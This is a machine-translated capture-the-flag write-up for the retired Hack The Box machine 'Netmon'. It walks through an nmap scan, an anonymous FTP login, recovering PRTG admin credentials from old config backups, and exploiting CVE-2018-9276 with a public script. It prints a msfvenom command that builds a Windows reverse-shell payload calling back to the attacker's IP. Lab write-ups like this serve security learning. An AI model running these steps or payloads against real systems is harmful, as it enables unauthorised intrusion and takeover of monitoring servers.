{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-netmon-en","result":{"data":{"markdownRemark":{"id":"eb71b3d3-b709-514f-a057-bc4ec300c51c","html":"
\n

This page has been machine-translated from the original page.

\n
\n

I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.

\n\"Hack\n

This is a writeup for the retired HackTheBox machine “Netmon.”

\n

\n \n /etc/hosts\nnmap -sV -sC -T4 $RHOST| tee nmap1.txt\n

The output looked like this:

\n
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-23 19:35 JST\nStats: 0:01:55 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan\nConnect Scan Timing: About 66.94% done; ETC: 19:38 (0:00:57 remaining)\nWarning: 10.10.10.152 giving up on port because retransmission cap hit (6).\nNmap scan report for $RHOST (10.10.10.152)\nHost is up (0.68s latency).\nNot shown: 994 closed tcp ports (conn-refused)\nPORT    STATE    SERVICE      VERSION\n21/tcp  open     ftp          Microsoft ftpd\n| ftp-syst: \n|_  SYST: Windows_NT\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| 02-02-19  11:18PM                 1024 .rnd\n| 02-25-19  09:15PM       <DIR>          inetpub\n| 07-16-16  08:18AM       <DIR>          PerfLogs\n| 02-25-19  09:56PM       <DIR>          Program Files\n| 02-02-19  11:28PM       <DIR>          Program Files (x86)\n| 02-03-19  07:08AM       <DIR>          Users\n|_02-25-19  10:49PM       <DIR>          Windows\n80/tcp  open     http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)\n| http-title: Welcome | PRTG Network Monitor (NETMON)\n|_Requested resource was /index.htm\n|_http-trane-info: Problem with XML parsing of /evox/about\n|_http-server-header: PRTG/18.1.37.13946\n135/tcp open     msrpc        Microsoft Windows RPC\n139/tcp open     netbios-ssn  Microsoft Windows netbios-ssn\n445/tcp open     microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds\n514/tcp filtered shell\nService Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   3.1.1: \n|_    Message signing enabled but not required\n| smb-security-mode: \n|   account_used: <blank>\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-time: \n|   date: 2021-11-23T10:44:51\n|_  start_date: 2021-11-23T04:32:58\n|_clock-skew: mean: 6m19s, deviation: 0s, median: 6m18s\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ .\nNmap done: 1 IP address (1 host up) scanned in 200.12 seconds
\n

We can see that Anonymous FTP login is enabled.

\n

FTP Login

\n

After performing an Anonymous login, I was immediately able to obtain the user flag.

\n
ftp $RHOST\n# anonymous / no password\n\ndir Users/Public\nlcd ./\ncd Users/Public\ndir\nget user.txt
\n

Next, I aim to obtain a reverse shell in order to get the root flag.

\n

Obtaining a Reverse Shell

\n

From the nmap results, we can see that Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) is running.

\n
80/tcp  open     http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
\n

Searching for vulnerabilities in this version, I found CVE-2018-9276.

\n

Reference: NVD - CVE-2018-9276

\n

CVE-2018-9276 appears to be an OS command injection vulnerability where executing RCE can yield a shell with administrator privileges.

\n

If this works, we should be able to get root as well.

\n

Obtaining Credentials

\n

To use CVE-2018-9276, we need credentials for Paessler PRTG bandwidth monitor.

\n

So I began searching for credentials.

\n

The default credential appears to be prtgadmin, but that didn’t work.

\n

Reference: What’s the login name and password for the PRTG web interface? How do I change it? | Paessler Knowledge Base

\n

So I explored the FTP server while logged in anonymously, looking for files containing credentials.

\n

In most cases when searching for credentials, I target one of the following first:

\n\n

This time, I explored Paessler/PRTG Network Monitor under C:\\ProgramData\\.

\n

Note that hidden folders like C:\\ProgramData\\ are not listed by the FTP dir command.

\n

After obtaining a configuration backup file in this directory, I found the credentials prtgadmin / PrTg@dmin2018.

\n

Unfortunately, these credentials are no longer valid.

\n

Looking at the creation dates of the config files, the backup file containing PrTg@dmin2018 was created in 2018, while the current configuration file was created in 2019.

\n

So I tried prtgadmin / PrTg@dmin2019, and authentication succeeded.

\n

Exploitation

\n

Now that I have credentials, I want to use this exploit code to obtain root.

\n

Reference: CVE-2018-9276/exploit.py at main · A1vinSmith/CVE-2018-9276

\n

I created my own msfvenom exploit module to make it work in my local environment, and partially modified the exploit code.

\n
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.7 LPORT=4444 -f dll > venom
\n

Running this, I was successfully able to obtain root.

\n

Summary

\n

This was a very simple machine.

","fields":{"slug":"/hackthebox-windows-netmon-en","tagSlugs":["/tag/hack-the-box-en/","/tag/windows-en/","/tag/easy-box-en/","/tag/english/"]},"frontmatter":{"date":"2021-11-24","description":"A writeup of the retired HackTheBox machine 'Netmon'.","tags":["HackTheBox (en)","Windows (en)","EasyBox (en)","English"],"title":"HackTheBox Writeup: Netmon (Easy/Windows)","socialImage":{"publicURL":"/static/dc4d8b7f8795f3c3d3489d9957d155f2/no-image.png"}}}},"pageContext":{"slug":"/hackthebox-windows-netmon-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}